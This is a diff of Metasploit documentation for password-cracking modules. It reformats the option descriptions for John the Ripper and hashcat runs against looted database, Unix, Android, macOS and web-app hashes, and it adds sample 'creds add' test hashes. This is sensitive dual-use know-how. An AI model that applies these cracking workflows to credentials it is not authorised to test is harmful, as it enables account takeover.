|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -18,7 +18,7 @@
|
||||
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|----------------|-------------|---------|
|
||||
| -------------- | ----------- | ------- |
|
||||
| mysql | mysql | 200 |
|
||||
| mysql-sha1 | mysql-sha1 | 300 |
|
||||
| mssql | mssql | 131 |
|
||||
@@ -43,62 +43,62 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CRACKER_PATH**
|
||||
### CRACKER_PATH
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
### DeleteTempFiles
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**Fork**
|
||||
### Fork
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
**INCREMENTAL**
|
||||
### INCREMENTAL
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
The max-run-time for each iteration of cracking.
|
||||
The max-run-time for each iteration of cracking.
|
||||
|
||||
**KORELOGIC**
|
||||
### KORELOGIC
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MSSQL**
|
||||
### MSSQL
|
||||
|
||||
Crack MSSQL hashes. Default is `true`.
|
||||
Crack MSSQL hashes. Default is `true`.
|
||||
|
||||
**MYSQL**
|
||||
### MYSQL
|
||||
|
||||
Crack MySQL hashes. Default is `true`.
|
||||
Crack MySQL hashes. Default is `true`.
|
||||
|
||||
**MUTATE**
|
||||
### MUTATE
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -108,53 +108,53 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**ORACLE**
|
||||
### ORACLE
|
||||
|
||||
Crack oracle hashes. Default is `true`.
|
||||
Crack oracle hashes. Default is `true`.
|
||||
|
||||
|
||||
**POSTGRES**
|
||||
### POSTGRES
|
||||
|
||||
Crack postgres hashes. Default is `true`.
|
||||
Crack postgres hashes. Default is `true`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -11,7 +11,7 @@
|
||||
* `SHA512` based passwords
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|----------|-------------|-------- |
|
||||
| -------- | ----------- | ------- |
|
||||
| des | descript | 1500 |
|
||||
| md5 | md5crypt | 500 |
|
||||
| bsdi | bsdicrypt | 12400 |
|
||||
@@ -33,71 +33,70 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
**BLOWFISH**
|
||||
### BLOWFISH
|
||||
|
||||
Crack Blowfish hashes. Default is `false`.
|
||||
Crack Blowfish hashes. Default is `false`.
|
||||
|
||||
**BSDi**
|
||||
### BSDi
|
||||
|
||||
Crack BSDi hashes. Default is `true`.
|
||||
Crack BSDi hashes. Default is `true`.
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
### CRACKER_PATH
|
||||
|
||||
**CRACKER_PATH**
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
### DES
|
||||
|
||||
**DES**
|
||||
Crack DES hashes. Default is `true`.
|
||||
|
||||
Crack DES hashes. Default is `true`.
|
||||
### DeleteTempFiles
|
||||
|
||||
**DeleteTempFiles**
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
### Fork
|
||||
|
||||
**Fork**
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
### INCREMENTAL
|
||||
|
||||
**INCREMENTAL**
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
The max-run-time for each iteration of cracking.
|
||||
|
||||
The max-run-time for each iteration of cracking.
|
||||
### KORELOGIC
|
||||
|
||||
**KORELOGIC**
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
### MD5
|
||||
|
||||
**MD5**
|
||||
Crack MD5 hashes. Default is `true`.
|
||||
|
||||
Crack MD5 hashes. Default is `true`.
|
||||
### MUTATE
|
||||
|
||||
**MUTATE**
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -107,52 +106,52 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHA256**
|
||||
### SHA256
|
||||
|
||||
Crack SHA256 hashes. Default is `false`.
|
||||
Crack SHA256 hashes. Default is `false`.
|
||||
|
||||
**SHA512**
|
||||
### SHA512
|
||||
|
||||
Crack SHA12 hashes. Default is `false`.
|
||||
Crack SHA12 hashes. Default is `false`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -10,7 +10,7 @@
|
||||
Formats:
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|----------------------| -----|---------|
|
||||
| -------------------- | ---- | ------- |
|
||||
| android-md5 | n/a | 10 |
|
||||
| android-samsung-sha1 | n/a | 5800 |
|
||||
| android-sha1 | n/a | 110 |
|
||||
@@ -29,62 +29,62 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat (default).
|
||||
Use hashcat (default).
|
||||
|
||||
## Options
|
||||
|
||||
**MD5**
|
||||
### MD5
|
||||
|
||||
Crack `android-md5` based passwords. Default is `true`
|
||||
Crack `android-md5` based passwords. Default is `true`
|
||||
|
||||
**SHA1**
|
||||
### SHA1
|
||||
|
||||
Crack `android-sha1` (non-samsung) based passwords. Default is `true`
|
||||
Crack `android-sha1` (non-samsung) based passwords. Default is `true`
|
||||
|
||||
**SAMSUNG**
|
||||
### SAMSUNG
|
||||
|
||||
Crack `android-samsung-sha1` based passwords. Default is `true`
|
||||
Crack `android-samsung-sha1` based passwords. Default is `true`
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CRACKER_PATH**
|
||||
### CRACKER_PATH
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
### DeleteTempFiles
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**Fork**
|
||||
### Fork
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
**INCREMENTAL**
|
||||
### INCREMENTAL
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
The max-run-time for each iteration of cracking
|
||||
The max-run-time for each iteration of cracking
|
||||
|
||||
**KORELOGIC**
|
||||
### KORELOGIC
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
### MUTATE
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -94,44 +94,44 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
@@ -141,7 +141,9 @@ The following is data which can be used to test integration, including adding en
|
||||
to a wordlist and pot file to test various aspects of the cracker.
|
||||
|
||||
```
|
||||
creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
|
||||
creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
|
||||
creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
|
||||
creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
|
||||
```
|
||||
|
||||
### Hashcat
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
* `PBKDF2-HMAC-SHA512` based passwords (10.8+)
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|--------------------|--------------------|---------|
|
||||
| ------------------ | ------------------ | ------- |
|
||||
| xsha | xsha | 122 |
|
||||
| xsha512 | xsha512 | 1722 |
|
||||
| pbkdf2-hmac-sha512 | pbkdf2-hmac-sha512 | 7100 |
|
||||
@@ -27,54 +27,54 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CRACKER_PATH**
|
||||
### CRACKER_PATH
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
### DeleteTempFiles
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**Fork**
|
||||
### Fork
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
**INCREMENTAL**
|
||||
### INCREMENTAL
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
The max-run-time for each iteration of cracking.
|
||||
The max-run-time for each iteration of cracking.
|
||||
|
||||
**KORELOGIC**
|
||||
### KORELOGIC
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MUTATE**
|
||||
### MUTATE
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -84,52 +84,52 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**PBKDF2-HMAC-SHA512**
|
||||
### PBKDF2-HMAC-SHA512
|
||||
|
||||
Crack SHA12 hashes. Default is `true`.
|
||||
Crack SHA12 hashes. Default is `true`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
**XSHA**
|
||||
### XSHA
|
||||
|
||||
Crack xsha based hashes. Default is `true`.
|
||||
Crack xsha based hashes. Default is `true`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
* `mediawiki` based passwords
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|-----------|------------------|-------- |
|
||||
| --------- | ---------------- | ------- |
|
||||
| atlassian | PBKDF2-HMAC-SHA1 | 12001 |
|
||||
| mediawiki | mediawiki | 3711 |
|
||||
| phpass | phpass | 400 |
|
||||
@@ -27,63 +27,63 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
**ATLASSIAN**
|
||||
### ATLASSIAN
|
||||
|
||||
Crack atlassian hashes. Default is `true`.
|
||||
Crack atlassian hashes. Default is `true`.
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
|
||||
**CRACKER_PATH**
|
||||
### CRACKER_PATH
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
### DeleteTempFiles
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**Fork**
|
||||
### Fork
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
**INCREMENTAL**
|
||||
### INCREMENTAL
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
The max-run-time for each iteration of cracking.
|
||||
The max-run-time for each iteration of cracking.
|
||||
|
||||
